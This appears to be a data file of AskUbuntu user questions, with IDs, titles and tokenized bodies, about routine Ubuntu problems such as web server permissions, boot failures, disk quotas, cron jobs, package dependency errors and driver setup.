177283	what are proper permissions for localhost php files ? getting 403 error	this is driving me crazy . really crazy . quick story . i 've created a symlink : sudo ln -s /home/richardmandx/dropbox/www /var/ when i go to localhost ( installed via sudo task-sel lamp-server ) you do n't have permission to access / on this server . the problem is , that i 've been trying since like 2-3 hours getting this to work and i 've changed permissions so i have a real mess now . things i want to acomplish : 1 ) need to fix permissions again for /home/richardmandx and /home/richardmandx/dropbox/www 2 ) i do n't know if the symlink /var/www inherits the permissions , if not , i think they need to be fixed . 3 ) get rid of 403 error by configuring whatever it needs to be done . i 'd swear this was an easy task ubuntu 8-9 but in ubuntu 11-12 it 's getting hard for me to get it . if this helps , when i run ls -la in my /home/richardmandx i have this ( trunked ) : drwxr-xr-x 5 root root 4096 ago 17 20:52 .. -rw -- -- -- - 1 richardmandx richardmandx 2344 ago 17 22:37 .bash_history -rw-r -- r -- 1 richardmandx richardmandx 220 ago 17 14:59 .bash_logout drwx -- -- -- 6 richardmandx richardmandx 4096 ago 17 19:52 .cache drwxr-xr-x 14 richardmandx richardmandx 4096 ago 17 20:03 .config drwx -- -- -- 3 richardmandx richardmandx 4096 ago 17 15:23 .dbus drwxr-xr-x 2 richardmandx richardmandx 4096 ago 17 20:33 descargas -rw -- -- -- - 1 richardmandx richardmandx 28 ago 17 22:40 .dmrc drwxr-xr-x 2 richardmandx richardmandx 4096 ago 17 15:23 documentos drwx -- -- -- 3 richardmandx richardmandx 4096 ago 17 23:00 .dropbox drwx -- -- -- 4 richardmandx richardmandx 4096 ago 17 22:40 dropbox drwxr-xr-x 3 richardmandx richardmandx 4096 ago 17 20:31 .dropbox-dist drwxr-xr-x 2 richardmandx richardmandx 4096 ago 17 15:23 desktop inside /home/richarmandx/dropbox/www looks like this : drwxr-xr-x 6 www-data www-data 4096 ago 17 20:56 pyrocms drwxr-xr-x 5 www-data www-data 4096 ago 17 20:58 ricvega drwxr-xr-x 6 www-data www-data 4096 ago 17 20:58 ser-website drwxr-xr-x 3 www-data www-data 4096 ago 17 20:37 slate drwxr-xr-x 9 www-data www-data 4096 ago 17 21:13 sofom drwxr-xr-x 6 www-data www-data 4096 ago 17 20:59 tzz drwxr-xr-x 11 www-data www-data 4096 ago 17 20:58 vanilla and finally , my symlink /var/www looks like this : drwxr-xr-x 6 www-data www-data 4096 ago 17 20:56 pyrocms drwxr-xr-x 5 www-data www-data 4096 ago 17 20:58 ricvega drwxr-xr-x 6 www-data www-data 4096 ago 17 20:58 ser-website drwxr-xr-x 3 www-data www-data 4096 ago 17 20:37 slate drwxr-xr-x 9 www-data www-data 4096 ago 17 21:13 sofom drwxr-xr-x 6 www-data www-data 4096 ago 17 20:59 tzz drwxr-xr-x 11 www-data www-data 4096 ago 17 20:58 vanilla can some good soul can help me fixing this ? thank you in advance ! ! !
177287	black screen on login , can get thru decrypt disk and access command line but no gui	running 12.04 64 bit fresh alternative install , with disk crypto on a new lenovo laptop install did n't connect and install modules , even though i had the network cable plugged in and do n't have any whacky proxy settings . i had to manually install ubuntu-desktop and define sources after initial installation , so this seemed a bit weird ( iso matched md5 sum though ) i unplug the network cable , otherwise i get a black screen that i can do nothing with . so i turn laptop on , i have disk encryption , i type in the password at the ubuntu decryption gui then get `` set up successfully '' message '' waiting for network configuration ... '' then `` waiting for up to 60 more seconds for network configuration '' at this stage ( a ) if i wait for it then i get a black screen that i can do nothing with . ( b ) if i interrupt the process by pressing escape , then i break through to the command line . from the command line , i can go ahead and login , then plug my network cable in to do apt-get commands . as a precaution i do some house keeping which takes a few mins to run : sudo apt-get update sudo apt-get upgrade running startx to get to the gui gives : fatal server errror : no screens found the .xauthority file is being created in my home directory but it 's empty . i review my order and note the system graphics : intel hd graphics ( wwan or msata capable ) so it 's weird that i ca n't get to the gnome . it looks like drivers are n't working . is there a way of getting intel drivers from the command line ? or do you have any other suggestions on what to try next ?
177291	unable to install k3b on ubuntu 12.04	i go to the software center , click install under k3b , and within seconds i am greeted with a message that says this : cd/dvd 'ubuntu-server 12.04 lts _precise pangolin_ - release i386 ( 20120424.1 ) ' is required please insert the above cd/dvd into the drive '/media/cdrom/ ' to install software packages from it .
177295	setting up group disk quotas	i am hoping to get some advice in setting up disk quotas . so , i know about : adding usrquota and grpquota on to /etc/fstab for the file systems that need to be managed . using edquota to assign disk quotas to users . however , i need to do the last step for multiple users and edquota seems to be a bit troublesome . one solution that i have found is that i can do : sudo edquota -u foo -p bar . this will copy the disk quota of bar to user foo . i was wondering if this is the best solution ? i tried setting up group disk quotas but they do n't seem to be working . are group quotas meant to help in the assignment of the same quota to multiple users ? or are they suppose to give a total limit to a set of users ? for example , if users a , b , c are in group x then assigning a quota of 20 gb gives each user 20 gb or does it give 20 gb to the entire group x to divide up ? i 'm interested in doing the former , but not the latter . right now , i 've assigned group disk quotas and they are n't working . so , i guess it is due to my misunderstanding of group disk quotas ... my problem is i want to easily give the same quota to multiple users ; any suggestions on the best way to do this out of what i 've tried above or anything else i may not have thought of ? thank you !
177299	scripts slowing boot	inspired by the `` how fast '' video , i 've recently been trying to speed up my boot up as much as possible . i 've been reading many forums on different approaches but i 've recently hit a wall with a particular problem . i 've turned on verbose boot , and everything seems to move through incredibly fast except at one point , it pauses for about ten seconds on something that looks like : 'begin running /scripts/init/bottom ... . done' is there a reason why it is stopping at this particular point for so long ? it displays `` done '' almost immediately . for the record , it 's a fresh install . any help would be greatly appreciated . i displayed the scripts that ran at startup with initctl list the results were : -avahi-daemon start/running , process 858 -mountall-net stop/waiting -nmbd start/running , process 24028 -rc stop/waiting -rsyslog start/running , process 846 -tty4 start/running , process 941 -udev start/running , process 335 -upstart-udev-bridge start/running , process 331 -ureadahead-other stop/waiting -whoopsie start/running , process 1024 -apport start/running -console-setup stop/waiting -hwclock-save stop/waiting -irqbalance start/running , process 1027 -plymouth-log stop/waiting -smbd start/running , process 801 -tty5 start/running , process 948 -failsafe stop/waiting -hybrid-gfx stop/waiting -modemmanager start/running , process 830 -rfkill-store stop/waiting -atd start/running , process 1025 -dbus start/running , process 809 -failsafe-x stop/waiting -mounted-var stop/waiting -plymouth stop/waiting -resolvconf start/running -udev-fallback-graphics stop/waiting -control-alt-delete stop/waiting -hwclock stop/waiting -mounted-proc stop/waiting -network-manager start/running , process 841 -alsa-store stop/waiting -module-init-tools stop/waiting -setvtrgb stop/waiting -shutdown stop/waiting -alsa-restore stop/waiting -cron start/running , process 1026 -lightdm start/running , process 1166 -mountall stop/waiting -mounted-debugfs stop/waiting -binfmt-support stop/waiting -console stop/waiting -mounted-run stop/waiting -acpid start/running , process 1009 -bluetooth start/running , process 832 -plymouth-stop stop/waiting -rcs stop/waiting -ufw start/running -wait-for-state stop/waiting -flush-early-job-log stop/waiting -friendly-recovery stop/waiting -rc-sysinit stop/waiting -cups start/running , process 900 -upstart-socket-bridge start/running , process 699 -anacron stop/waiting -tty2 start/running , process 969 -udevtrigger stop/waiting -container-detect stop/waiting -mounted-dev stop/waiting -tty3 start/running , process 974 -udev-finish stop/waiting -hostname stop/waiting -mountall-reboot stop/waiting -mountall-shell stop/waiting -mounted-tmp stop/waiting -network-interface ( lo ) start/running -network-interface ( eth0 ) start/running -network-interface ( eth1 ) start/running -plymouth-splash stop/waiting -plymouth-upstart-bridge stop/waiting -tty1 start/running , process 2021 -udevmonitor stop/waiting -dmesg stop/waiting -network-interface-security ( network-manager ) start/running -network-interface-security ( network-interface/eth1 ) start/running -network-interface-security ( network-interface/eth0 ) start/running -network-interface-security ( network-interface/lo ) start/running -network-interface-security ( networking ) start/running -networking stop/waiting -procps stop/waiting -rfkill-restore stop/waiting -tty6 start/running , process 977 -network-interface-container stop/waiting -ureadahead stop/waiting sorry that i could n't copy the exact bit of code it was stuck on , i 've been searching through the log files in /var/log via the `` find '' function , but so far i 've been unable to find anything . i have found many different boot log files , but none which display /init/bottom i mentioned above .
177304	why does n't this script output to a text file when run from cron ?	i have created a shell script as below sample.sh echo `` hi there '' i also added cron job in cron tab which is under /etc/crontab as below * * * * * /home/sample.sh > /home/sample.txt i have created the sample.txt file in /home/ directory . i have also checked the permission for read and write for both the file when i execute the sample.sh file it works fine.it writes in sample.txt file now i do n't understand why it is not writing in the text file from the cron task i scheduled i am using ubuntu 10.04 please help me in fixing this issue
177312	filesystem filling up due to large uvcydnctrl-udev.log file	now my installation of ubuntu costs me more than 100 gb of the hard drive space . and whenever i try fslint and fdupes , they say permission denied to delete the duplicates . please help me guys . additional info output of df : filesystem size used avail use % mounted on /dev/sda1 296g 191g 90g 68 % / udev 993m 4.0k 993m 1 % /dev tmpfs 401m 824k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1003m 552k 1002m 1 % /run/shm /home/zipro/.private 296g 191g 90g 68 % /home/zipro the faulty file is a 174gb /var/log/uvcydnctrl-udev.log
177327	can not start ubuntu after upgrading from 11.10 to 12.04 : glibc6 error	i am not able to start my linux . recently i tried to upgrade it from 11.10 to 12.04 . due to some errors it was partially upgraded . but later on i am not able to start linux . it is showing an error `` glib-6 '' is missing.. any help ...
177329	how do i install a driver provided as source code ?	i have a usb-to-lan converter , and downloaded the its drivers . the driver folder consists of a makefile file , a .c file and a .h file . how do i install such a driver ?
177330	are the ubuntu sites down ?	i just logged in toady and wanted to update my software and apparently apt-get update can not fetch the launchpad repos . when i checked in my browser neither launchpad.net nor ubuntuforums can be accessed . so my question is simple : are they down or is it just me ?
177336	standard user use software center	i have created a user and add him to the standard group . now he can not use software center , so i want him to stay in standard group but allow him to user software center . what is the best way to do that .
177337	burg custom icons work only with specific themes	i have made a custom icon for burg loader for my lenovo recovery partition.i have made 3 icons : large_qdrive.png ( 128 x 128 pixels ) small_qdrive.png ( 24 x 24 pixels ) grey_qdrive.png ( 128 x 128 pixels ) the .png icons that i created i made them using gimp from a qdrive.ico file that i found in the lenovo recovery partition . i transferred the icons to the /boot/burg/themes/icons folder and i added to the class list of the grey , large , small and the hover files the following lines : -qdrive { image = `` $ $ /large_qdrive.png '' } in the large file -qdrive { image = `` $ $ /small_qdrive.png '' } in the small file -qdrive { image = `` $ $ /grey_qdrive.png '' } in the grey file -qdrive { image = `` $ $ /grey_qdrive.png : $ $ /large_qdrive.png '' } in the hover file i ran sudo update-burg and after that i modified the following line in the burg.cfg file : menuentry `` windows 7 ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { to menuentry `` windows 7 ( loader ) ( on /dev/sda2 ) '' -- class qdrive -- class os { and i also tried to change the title for the lenovo recovery partition , so i tried this as well : menuentry `` lenovo recovery partition ( on /dev/sda2 ) '' -- class qdrive -- class os { none of this tries enforced actually burg loader to use the custom icon that i made and i ca n't figure out why . i have to mention also that there are a few themes that i have installed in burg which actually are able to use the small_qdrive.png icon that i made , but all the others which use either the large_qdrive.png or the grey_qdrive.png were n't able to use the custom icons . i have double checked for typos in all the files that i have created or i modified , so i am pretty sure that i have n't misspelled anything . i have checked also the title of the custom icons that i made and neither of them have a typo . i have looked also if there are any other folder that the themes might use to retrieve the icons , but it seems that all of them except for **fortune** theme , which i downloaded from omg ! ubuntu , use the icons folder which is located in /boot/burg/themes/icons i tried to add the custom icons to the icons folder of the theme **fortune** , but still nothing happened .
177340	how to fix severe libqt4 package dependency problems ?	how can i fix my software center ? i ca n't update ubuntu or anything without getting an error that items can not be installed until the package catalog is repaired . below is the errors i get . please help i 'm a noob ubuntu . installarchives ( ) failed : dpkg : error processing libqt4-xmlpatterns : i386 ( -- configure ) : libqt4-xmlpatterns : i386 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-xmlpatterns : amd64 is in a different version ( 4:4.8.1-0ubuntu4.2 ) dpkg : error processing libqt4-xmlpatterns ( -- configure ) : libqt4-xmlpatterns : amd64 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-xmlpatterns : i386 is in a different version ( 4:4.8.1-0ubuntu4.1 ) no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-declarative : i386 : libqt4-declarative : i386 depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-xmlpatterns : i386 on system is 4:4.8.1-0ubuntu4.1 . dpkg : error processing libqt4-declarative : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : libqt4-declarative depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-xmlpatterns is not configured yet . dpkg : error processing libqt4-declarative ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-declarative : i386 is not configured yet . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-declarative is not configured yet . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-designer : libqt4-designer depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-designer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-designer : i386 : libqt4-designer : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-designer : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-help : libqt4-help depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-help ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-opengl : i386 : libqt4-opengl : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-opengl : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-qt3support : i386 : libqt4-qt3support : i386 depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-designer : i386 is not configured yet . libqt4-qt3support : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-qt3support : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : libqt4-scripttools depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-scripttools ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-scripttools : i386 : libqt4-scripttools : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-scripttools : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-svg ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libqt4-svg : i386 : libqt4-svg : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-svg : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqt4-xmlpatterns : i386 libqt4-xmlpatterns libqt4-declarative : i386 libqt4-declarative libqtgui4 : i386 libqtgui4 libqt4-designer libqt4-designer : i386 libqt4-help libqt4-opengl libqt4-opengl : i386 libqt4-qt3support : i386 libqt4-scripttools libqt4-scripttools : i386 libqt4-svg libqt4-svg : i386 error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : dependency problems prevent configuration of libqt4-declarative : i386 : libqt4-declarative : i386 depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-xmlpatterns : i386 on system is 4:4.8.1-0ubuntu4.1 . dpkg : error processing libqt4-declarative : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-xmlpatterns ( -- configure ) : libqt4-xmlpatterns : amd64 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-xmlpatterns : i386 is in a different version ( 4:4.8.1-0ubuntu4.1 ) dpkg : error processing libqt4-xmlpatterns : i386 ( -- configure ) : libqt4-xmlpatterns : i386 4:4.8.1-0ubuntu4.1 can not be configured because libqt4-xmlpatterns : amd64 is in a different version ( 4:4.8.1-0ubuntu4.2 ) dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-declarative : i386 is not configured yet . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : libqt4-declarative depends on libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-xmlpatterns is not configured yet . dpkg : error processing libqt4-declarative ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : i386 : libqt4-svg : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-svg : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : i386 : libqt4-opengl : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-opengl : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-designer : i386 : libqt4-designer : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-designer : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : i386 : libqt4-scripttools : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-scripttools : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-qt3support : i386 : libqt4-qt3support : i386 depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-designer : i386 is not configured yet . libqt4-qt3support : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-qt3support : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-declarative is not configured yet . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-svg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-designer : libqt4-designer depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-designer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-help : libqt4-help depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-help ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : libqt4-scripttools depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-scripttools ( -- configure ) : dependency problems - leaving unconfigured
177346	how to use fdupes ?	when i run fdupes , it finds more than 30,000 of duplicate files.i need to keep one file and delete all other duplicates because some of them are systemfiles.please give me a command or script to do this without pressing `` 1 or 2 or all '' for each and every group of duplicate files .
177347	how can get a quassel-client and quassel-core irc setup and running ?	i want to use quassel to access my irc channels from multiple laptops , and want to know how to get it set up . i have a server i will install the core on and several laptops that will run the client . how can i get the perfect quassel irc setup ?
177348	how do i disable the screensaver/lock ?	when i 'm watching a film in mythtv the screen turns to black every 10 - 15 mins and i have to log back into ubuntu . very annoying ! how do i disable the black screen / screensaver / logout in unity ? there no longer seems to be any options to turn the screen saver off as there were in ubuntu prior to unity .
177352	after kernel upgrade , unable to boot with / on lvm	i did a kernel upgrade on my desktop system from 2.6.32-41 to 2.6.32-42 using apt-get dist-upgrade . i opted not to update /boot/grub/menu.lst and added the required lines myself , based on the previous version . ( as i found from previous experience that the automatic update trashes the existing entires ! ) so the relevant lines for non-recovery mode read : title ubuntu 10.04.4 lts , kernel 2.6.32-42-generic uuid 099b8ec7-c3b2-4f46-a52c-8e95d6a7b9de kernel /vmlinuz-2.6.32-42-generic root=/dev/smallvg-filesystemlv ro quiet splash initrd /initrd.img-2.6.32-42-generic quiet title ubuntu 10.04.4 lts , kernel 2.6.32-41-generic uuid 099b8ec7-c3b2-4f46-a52c-8e95d6a7b9de kernel /vmlinuz-2.6.32-41-generic root=/dev/mapper/smallvg-filesystemlv ro quiet splash initrd /initrd.img-2.6.32-41-generic quiet 2.6.32-41 boots normally ; 2.6.32-42 fails because it ca n't find the root partition , as the logical volume is n't mounted . it drops me into busybox , from which ( as suggested in answers to previous similar problems ) i can use lvm -vgscan and lvm vgchange -ay to verify that lvm is present and the partitions are visible to it . i have examined and compared the 2 /boot/initrd.img* files , and as far as i can tell the contained files and their contents are the same ( apart from the version changes ) , and checked the 2 /boot/config* files , which again only differ by version numbers . this seems to be a similar problem to this one , which does n't yet appear to have been resolved , although baronkarza does n't specify the kernel numbers involved . so i am at a loss to work out where it is broken . has anyone else experienced this ? can anyone help , please ?
177354	ca n't download anything from software center	i 'm new to ubuntu not found there isn’t a software package called “codeblocks” in your current software sources . not found there isn’t a software package called “vlc” in your current software sources in terminal package 'aircrack-ng ' has no installation candidate package 'vlc ' has no installation candidate and i ca n't find any software in synaptic either .
177365	ca n't run or install ubuntu from usb ( worked on another computer )	i 'm sorry if this has been mentioned before , but i could n't find anything on google about my specific error , so here goes ... i 've earlier prepared a live usb via unetbootin with ubuntu 12.04 ( 64-bit ) and could use it to both run ubuntu from the usb as well as installing on my laptop , which i did a few days ago . the laptop is a lenovo r500 running 64 bit windows 7 ( and now also ubuntu ) however when i try to do the same on my stationary computer ( an acer aspire m3641 running windows vista 32 bit ) , i ca n't get past the unetbootin splash screen . whichever option i choose , say for example `` try ubuntu without installing '' only brings up a flashing underscore at the bottom of the screen . ( the options are still visible ) this is what i remember happening from my laptop too ( briefly before starting ubuntu ) , but here it never gets past this point , it just keeps flashing . i suspect that the usb in some way disconnects from the computer as the light a few seconds after doing this turns off . i did find somewhere a solution for problems with nvidia cards which suggested adding a parameter `` nomodeset '' . i could not find the menu mentioned , but i did once by mistake stumble upon a single line containing the key words `` silent splash '' , ( the same `` > something ... . '' as what [ tab ] brings up , but with different text ) so i tried adding nomodeset and pressed enter . this actually seemed to start booting ubuntu , although with a more simple look than usual . it displayed a screen with 4 ? dots and then from what it seemed , started loading system resources , listing them on the screen . i do n't know the exact phrasing , but it stopped , displaying a massage along the lines of `` medium not found '' . ( medium for loading system resources perhaps , i do n't remember . ) i tried to burn a live cd on my laptop , but it failed when it was almost done . i 'm not sure why it failed , if it was too big ( it says that it 's 698 mb , so it should work ) or another reason , but i do n't feel like wasting cd 's , so i 've waited with trying that again . ( i did by the way md5sum the iso ) also as a final note , i did also make sure beforehand that the acer supported 64 bit . if there is anything else you need to know , just tell me . thanks in advance for any help . : ) i 'm apparently not able to comment because i did n't have an account when i wrote the question , so i 'll have to comment with an answer instead . ( i have an account now tough ) the computer is a few years old , so most likely usb 3.0 did n't exists when it was made . i should have mentioned it in the original question , but i 've already tried with three different usb sticks . two ( 32 & 64 bit ) via unetbootin 's automatic download , and one ( 64 bit ) through downloading an iso file . some people seemed to be having troubles with sandisk u3 sticks , so i also made sure that the third was of another brand . i 've now tried the alternate version on usb . it seems to freeze at the language select screen , again with the usb turning off the light . ( this however seems to happen before the language screen has appeared ) i will investigate some more ... i 've now also tried the alternate version via cd . ( i made sure to md5sum the disc btw ) running it from a cd , the gui is different than from the usb . the first thing that appears is a language select screen . after choosing language , there 's a purple screen with 5 options , ( now in my native language ) : install ubuntu test disk for defects memory test boot from primary hard drive recover broken system using the first option , ( after ~20 sec of black screen ) i get to a screen of the same style as the language screen from running the usb . however , this seems to be regional settings instead . again , it freezes like with the usb . i tried the second option . after a minute of black screen , i get a purple screen followed by a warning that says : '' your installation disc could not be mounted . this probably means that the cd was n't in the tray . in that case you can insert it and try again . try to mount cd again ? `` , followed by yes/no buttons . it 's however already frozen , so it 's not possible to do either of them . i also tried the memory test just to see if it worked and it did n't freeze . via f6 , i do have access to this list of options , which i have n't yet tried out . i might also try with english if that makes any difference .
177368	sudo : unable to resolve host ( name already added to /etc/hosts )	whenever i use sudo , i get this : sudo : unable to resolve host dave00-g31m-es2l here is my /etc/hosts : dave00 @ dave00-g31m-es2l : ~ $ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 dave00-g31m-es2 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters i logged out/in already . how can i solve this ?
177371	what is the best minimal http server ?	if i want to serve some static content over http from ubuntu , with an emphasis on security and efficiency ( at low-moderate load ) , what 's the best choice ?
177372	no sound using asus xonar dgx	i 've just bought a new sound card , asus xonar dgx , and it works perfectly in windows 7 . however , when i load up 12.04 , i get no sound whatsoever . i went into system settings â sound and there was nothing in the `` play sound through '' box . does anybody know how i can get my sound to work ?
177374	asus p8h77-mle graphics on ubuntu 10.04	running ubuntu 10.04.4 with all the latest updates for the main server . like to install my on-board motherboard graphics drivers for my asus p8h77-mle motherboard . i currently do n't have a graphics card installed , and are not going to . is there any way to install the on-board graphics drivers for ubuntu 10.04 under the system > admin > hardware drivers , nothing is listed . is there any web page or terminal i can use to guide me ?
177377	are there any instant-messaging clients for server ?	i have virtualbox based ubuntu server and i have used google to get answers for server based im and got it as jabber . but it is confusing to me . i would like someone to suggest me an instant-messaging client for servers . the answer does n't necessarily have to be only jabber . as long as the solution allows me to login into my google account for chatting in the server , i would be fine . and , i do n't have any xorg installed and i do n't want to install it either because i have very low ram for my main system .
177378	disk check on startup , ca n't connect with ssh	i run ubuntu server and use ssh to work on it . i 've noticed that once in a while after a reboot , the server will ask for a disk check . i have to manually tell the system to run or ignore it . however , i have no monitor attached to my server , and i wo n't be able to connect with ssh as long as the disk check did n't completed or was ignored . is there a way to : - automatically do the disk checks without the need of my permission ? - start the ssh server before the disk check ( i doubt this ) - do n't do any disk checks ( but this seems to me kind of a cheap way , because the checks are useful ) kind regards , brendt
177379	no vpn is running . what does this mean ?	i have installed openvpn using the command : sudo apt-get install openvpn after installing it , when i tried to start it , i get : * reloading virtual private network daemon ( s ) ... * no vpn is running . i 'm very new to ubuntu . i could n't able to get what no vpn is running . meant . does this mean any thing wrong in my installation ? i 'm using 12.04 ubuntu version and since openvpn uses , tun/tap , i wonder its already installed in 12.04 versions ? thanks in advance .
177384	bandwidth monitoring indicator ?	is there an app for bandwidth monitoring indicator particularly that be placed on the top panel for unity ? something similar to system monitor > resources > receiving and sending ?
177387	how to save a binary file bigger than a dvd to a set of dvds and how to recover them afterwards ?	how is it possible to save a file greater than 1 dvd to a set of dvds 14.8 gb and then how does one recover the file from the dvd set
177390	how can i solve this kazam problem ?	i want to record my desktop activity . before i could use kazam , but after a while kazam started to give an error . how can i solve it ? when running kazam via the terminal i get this output : traceback ( most recent call last ) : file `` /usr/bin/kazam '' , line 74 , in < module > appwindow = kazamapp ( datadir , args.debug ) file `` /usr/lib/python2.7/dist-packages/kazam/app.py '' , line 238 , in __init__ self.restore_state ( ) file `` /usr/lib/python2.7/dist-packages/kazam/app.py '' , line 578 , in restore_state self.volumebutton_audio2.set_value ( audio2_vol ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) valueerror : % f not in range % f to % f
